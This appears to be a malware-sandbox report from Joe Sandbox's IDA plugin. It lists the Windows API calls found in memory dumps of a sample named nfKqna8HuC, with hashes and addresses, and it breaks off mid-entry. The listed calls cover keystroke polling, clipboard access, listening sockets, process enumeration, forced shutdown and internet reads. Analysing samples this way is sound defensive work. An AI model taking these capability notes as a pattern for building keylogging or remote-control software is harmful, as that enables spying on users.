                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 1240663315-0
                                                                    • Opcode ID: 10c8a7fb84807068851d06684be1337e24c57dafb5a1b246ac0b988e2bc31d9e
                                                                    • Instruction ID: bc4aac70c67fe4b172818acf137f25a3d32832639fb0ce86c7712a22af29a29d
                                                                    • Opcode Fuzzy Hash: 10c8a7fb84807068851d06684be1337e24c57dafb5a1b246ac0b988e2bc31d9e
                                                                    • Instruction Fuzzy Hash: B2E15C31604220AFCB14EF28C991D6ABBE6EF89714F04855DF44AD7361DB30EA05CF56
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 00662B5F
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00662BE0
                                                                    • GetKeyState.USER32(000000A0), ref: 00662BFB
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00662C15
                                                                    • GetKeyState.USER32(000000A1), ref: 00662C2A
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00662C42
                                                                    • GetKeyState.USER32(00000011), ref: 00662C54
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00662C6C
                                                                    • GetKeyState.USER32(00000012), ref: 00662C7E
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00662C96
                                                                    • GetKeyState.USER32(0000005B), ref: 00662CA8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: 4bbc6f5d5174a916e99b00e899327f27a8ba2f1ec61623ad49e9e8a254bd1387
                                                                    • Instruction ID: 7d22fa9c3814139b409981ab5298dc2aa277a7490b7e6c4ee8ed52af532220f5
                                                                    • Opcode Fuzzy Hash: 4bbc6f5d5174a916e99b00e899327f27a8ba2f1ec61623ad49e9e8a254bd1387
                                                                    • Instruction Fuzzy Hash: 7D41E734904FCB6DFF749B6088643F9BEA2AF22348F048059D9C6567C1DB9499C4C7A2
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                    • String ID:
                                                                    • API String ID: 1737998785-0
                                                                    • Opcode ID: 3079903ffe4ae509496b10f1b8b0fd068240483606792826c2bfd739033b0a8f
                                                                    • Instruction ID: b94f527123de288441fe7ba0476ae3ae6ba2ca9461c8b12035fbae890d3faeb7
                                                                    • Opcode Fuzzy Hash: 3079903ffe4ae509496b10f1b8b0fd068240483606792826c2bfd739033b0a8f
                                                                    • Instruction Fuzzy Hash: 13218931300610AFDB11AF64DC59B6DB7AAEF45720F04A01AF94A9B2A1DB30F9018F98
                                                                    APIs
                                                                      • Part of subcall function 00659ABF: CLSIDFromProgID.OLE32 ref: 00659ADC
                                                                      • Part of subcall function 00659ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00659AF7
                                                                      • Part of subcall function 00659ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00659B05
                                                                      • Part of subcall function 00659ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00659B15
                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0067C235
                                                                    • _memset.LIBCMT ref: 0067C242
                                                                    • _memset.LIBCMT ref: 0067C360
                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0067C38C
                                                                    • CoTaskMemFree.OLE32(?), ref: 0067C397
                                                                    Strings
                                                                    • NULL Pointer assignment, xrefs: 0067C3E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                    • String ID: NULL Pointer assignment
                                                                    • API String ID: 1300414916-2785691316
                                                                    • Opcode ID: 3511af34a86c34dc3be1078c5e7ec31ef6477c79e385f3ce4012d48f915a3346
                                                                    • Instruction ID: 7ae01fec3c8716ca4b77439d79dede84c7e788693256da2f411cffb0141c074e
                                                                    • Opcode Fuzzy Hash: 3511af34a86c34dc3be1078c5e7ec31ef6477c79e385f3ce4012d48f915a3346
                                                                    • Instruction Fuzzy Hash: C6912C71D00228ABDB10DF94DC95EDEBBBAEF04720F10815EF919A7291DB709A45CFA4
                                                                    APIs
                                                                      • Part of subcall function 0065B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0065B180
                                                                      • Part of subcall function 0065B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0065B1AD
                                                                      • Part of subcall function 0065B134: GetLastError.KERNEL32 ref: 0065B1BA
                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00667A0F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                    • String ID: $@$SeShutdownPrivilege
                                                                    • API String ID: 2234035333-194228
                                                                    • Opcode ID: 7955584c9d9998ca64f104c4f794b05c98bb5c0d92942e3c9b2cc6414808949a
                                                                    • Instruction ID: b4be15fbb3a3ddbb11f2781d223a7e97a0d779859f6a26b023a20ccbbcc41d66
                                                                    • Opcode Fuzzy Hash: 7955584c9d9998ca64f104c4f794b05c98bb5c0d92942e3c9b2cc6414808949a
                                                                    • Instruction Fuzzy Hash: AF012B716582226AF72827F4CC4BBFF325B9B00358F241528FD13E22C2DA615F0195B4
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000001,00000006), ref: 00678CA8
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00678CB7
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00678CD3
                                                                    • listen.WSOCK32(00000000,00000005), ref: 00678CE2
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00678CFC
                                                                    • closesocket.WSOCK32(00000000), ref: 00678D10
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                                    • String ID:
                                                                    • API String ID: 1279440585-0
                                                                    • Opcode ID: 6e9a7ee6c80b9d2cf5e6a3112263d0381bab5d7e97c5b10bdd21ea3a98654d9b
                                                                    • Instruction ID: 301253ece41b6a10d5550ce4fee43251cb08c24c510d13fdd4081618cc947bbb
                                                                    • Opcode Fuzzy Hash: 6e9a7ee6c80b9d2cf5e6a3112263d0381bab5d7e97c5b10bdd21ea3a98654d9b
                                                                    • Instruction Fuzzy Hash: 9A21CE316006119FCB14EF68D949A6EB7AAAF49320F149158E95BA73D2CB30AD018F65
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00666554
                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00666564
                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00666583
                                                                    • __wsplitpath.LIBCMT ref: 006665A7
                                                                    • _wcscat.LIBCMT ref: 006665BA
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 006665F9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                    • String ID:
                                                                    • API String ID: 1605983538-0
                                                                    • Opcode ID: 963f03b8ecf3a593010765469e6dead26edbd85a54215b2770e233c97200dc35
                                                                    • Instruction ID: be33b94469c5b6b5862f5394844d1418be3020ae9d11f5c310460df8461264bb
                                                                    • Opcode Fuzzy Hash: 963f03b8ecf3a593010765469e6dead26edbd85a54215b2770e233c97200dc35
                                                                    • Instruction Fuzzy Hash: A8218771900218ABDB10ABA4DC89FEDB7BEAB45300F5004A9F506D7241DB71AF85CF61
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$l
                                                                    • API String ID: 0-3688285930
                                                                    • Opcode ID: 6e34e2993d07d64a5e7afd3d61454d0c3ff6dc9c40dbf0b8e234b1f21e7e6a25
                                                                    • Instruction ID: 8a5cd5d1eb6f65cd32afd2ea128d6f418451499c39b404999c31e6009db1c390
                                                                    • Opcode Fuzzy Hash: 6e34e2993d07d64a5e7afd3d61454d0c3ff6dc9c40dbf0b8e234b1f21e7e6a25
                                                                    • Instruction Fuzzy Hash: A7929B71A0062ACBDF24DF98D8407EDB7B3BB95314F14819AE816AB381D7719E81CF91
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 006613DC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen
                                                                    • String ID: ($,2m$<2m$|
                                                                    • API String ID: 1659193697-314102281
                                                                    • Opcode ID: 1ae85254a74b87ce24020f3967ccf7c30205ecbdc2c3e31a71cd4fc5911afacd
                                                                    • Instruction ID: 8c6165a07437d9c67f4189b47fd10ab158f1f5143121c3b6c231630925b39114
                                                                    • Opcode Fuzzy Hash: 1ae85254a74b87ce24020f3967ccf7c30205ecbdc2c3e31a71cd4fc5911afacd
                                                                    • Instruction Fuzzy Hash: 60321475A007059FC728CF69C4809AAB7F1FF49320B15C56EE59ADB3A2EB70E941CB44
                                                                    APIs
                                                                      • Part of subcall function 0067A82C: inet_addr.WSOCK32(00000000), ref: 0067A84E
                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00679296
                                                                    • WSAGetLastError.WSOCK32(00000000,00000000), ref: 006792B9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 4170576061-0
                                                                    • Opcode ID: 55889b9b52fdbe4741a8cf62f18b18ae8783d7ad9f773eff7fb6aa0368179c27
                                                                    • Instruction ID: cdd0a2137a2732e03b783b5867c579c3cb57b09c368cf73a97f9a45063d3adca
                                                                    • Opcode Fuzzy Hash: 55889b9b52fdbe4741a8cf62f18b18ae8783d7ad9f773eff7fb6aa0368179c27
                                                                    • Instruction Fuzzy Hash: F241C270600610AFDB54BB68C852E7E77EEEF45724F04844CF956AB3D2CA749D018BA5
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0066EB8A
                                                                    • _wcscmp.LIBCMT ref: 0066EBBA
                                                                    • _wcscmp.LIBCMT ref: 0066EBCF
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0066EBE0
                                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0066EC0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                                    • String ID:
                                                                    • API String ID: 2387731787-0
                                                                    • Opcode ID: c15e03d4d2c5028f2c4bc175abaec186fd0b19018db56f122d5bfa8f584f255e
                                                                    • Instruction ID: 23876adce3b941405c1ae15b49260310d8b0461a947b793b4152ba9d4980af6d
                                                                    • Opcode Fuzzy Hash: c15e03d4d2c5028f2c4bc175abaec186fd0b19018db56f122d5bfa8f584f255e
                                                                    • Instruction Fuzzy Hash: 0441AF796007028FCB08DF68C491A99B3E6FF49324F10455EE96A8B3A1DB32B945CF95
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                    • String ID:
                                                                    • API String ID: 292994002-0
                                                                    • Opcode ID: 5c862785e7ee65294edf5c844c440505d59cad611f044bc4b65b307c5d6e9c12
                                                                    • Instruction ID: eb9afad4764c549ff41c7cba1ceab14a4186b74d753e6b22a8f87b818e47d93d
                                                                    • Opcode Fuzzy Hash: 5c862785e7ee65294edf5c844c440505d59cad611f044bc4b65b307c5d6e9c12
                                                                    • Instruction Fuzzy Hash: 73116D317006126FE7217F26DC48AAFBB9BEF55760F445529F88AD7241CF34A9028BA4
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0063E014,75920AE0,0063DEF1,006BDC38,?,?), ref: 0063E02C
                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0063E03E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                    • API String ID: 2574300362-192647395
                                                                    • Opcode ID: b8e58b045497f450584aec1c25051c03856bfe2c53133d6c41775faf7dc74099
                                                                    • Instruction ID: cea86d0d64b6909bd271953a69a6327da7af5bd96714f67662be6e8abe26ff30
                                                                    • Opcode Fuzzy Hash: b8e58b045497f450584aec1c25051c03856bfe2c53133d6c41775faf7dc74099
                                                                    • Instruction Fuzzy Hash: 35D0A7708007139FC7355F61EC0865277D7AF21300F19441BE482D2790DBB4DC808EA0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throwstd::exception::exception
                                                                    • String ID: @$ n$ n$ n
                                                                    • API String ID: 3728558374-1613168149
                                                                    • Opcode ID: e8813cdb1a5727bf155c352eb0f48eb91057d81278a1e7d44d3d793443d72b41
                                                                    • Instruction ID: 9a6a207a2fd46539918bfc1029d9638f2161fb92d4c2620944c06cdc57bfcc3b
                                                                    • Opcode Fuzzy Hash: e8813cdb1a5727bf155c352eb0f48eb91057d81278a1e7d44d3d793443d72b41
                                                                    • Instruction Fuzzy Hash: 0B728B70E042199BCF14DF94C481AEEB7BBEF48310F14805AE909AB391DB75AE46CBD5
                                                                    APIs
                                                                      • Part of subcall function 0063B34E: GetWindowLongW.USER32(?,000000EB), ref: 0063B35F
                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 0063B22F
                                                                      • Part of subcall function 0063B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0063B5A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Proc$LongWindow
                                                                    • String ID:
                                                                    • API String ID: 2749884682-0
                                                                    • Opcode ID: 82f8ec74bbf5eddd649fd39bdc7d3d7f8547a50ff93a333e0a835a29282bc2b3
                                                                    • Instruction ID: 72348f72f82247f34ab80308d5a86a5d30aecfdfc4db33aa309cb5cfa87cf40e
                                                                    • Opcode Fuzzy Hash: 82f8ec74bbf5eddd649fd39bdc7d3d7f8547a50ff93a333e0a835a29282bc2b3
                                                                    • Instruction Fuzzy Hash: CBA16E70514105BAEF28AF294C88DFF295FEB46740F14531DF602D6A91DB269E02E3F6
                                                                    APIs
                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,006743BF,00000000), ref: 00674FA6
                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00674FD2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                    • String ID:
                                                                    • API String ID: 599397726-0
                                                                    • Opcode ID: 95a108cd037c6f0055ca740fd6116a426e129930c76f98ac944ecc2361befd56
                                                                    • Instruction ID: 326bf37e5884c9fdc56e152f0ed74f457cca945eeb9e439ccf51829e9d95db30
                                                                    • Opcode Fuzzy Hash: 95a108cd037c6f0055ca740fd6116a426e129930c76f98ac944ecc2361befd56
                                                                    • Instruction Fuzzy Hash: 2A41D871504209BFEB10DE94CC85EFF77BEEB80764F10806EF60AA6241EBB59E41D694
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: \Qm
                                                                    • API String ID: 4104443479-172261174
                                                                    • Opcode ID: 547d2714178258f336c0bd9d3aff238bd231589e63a4aa93254f011fc9ad791e
                                                                    • Instruction ID: 049eb78736858273de7bb02dded6b9bcfee74889dbfb3e26f7ef394cd58d8900
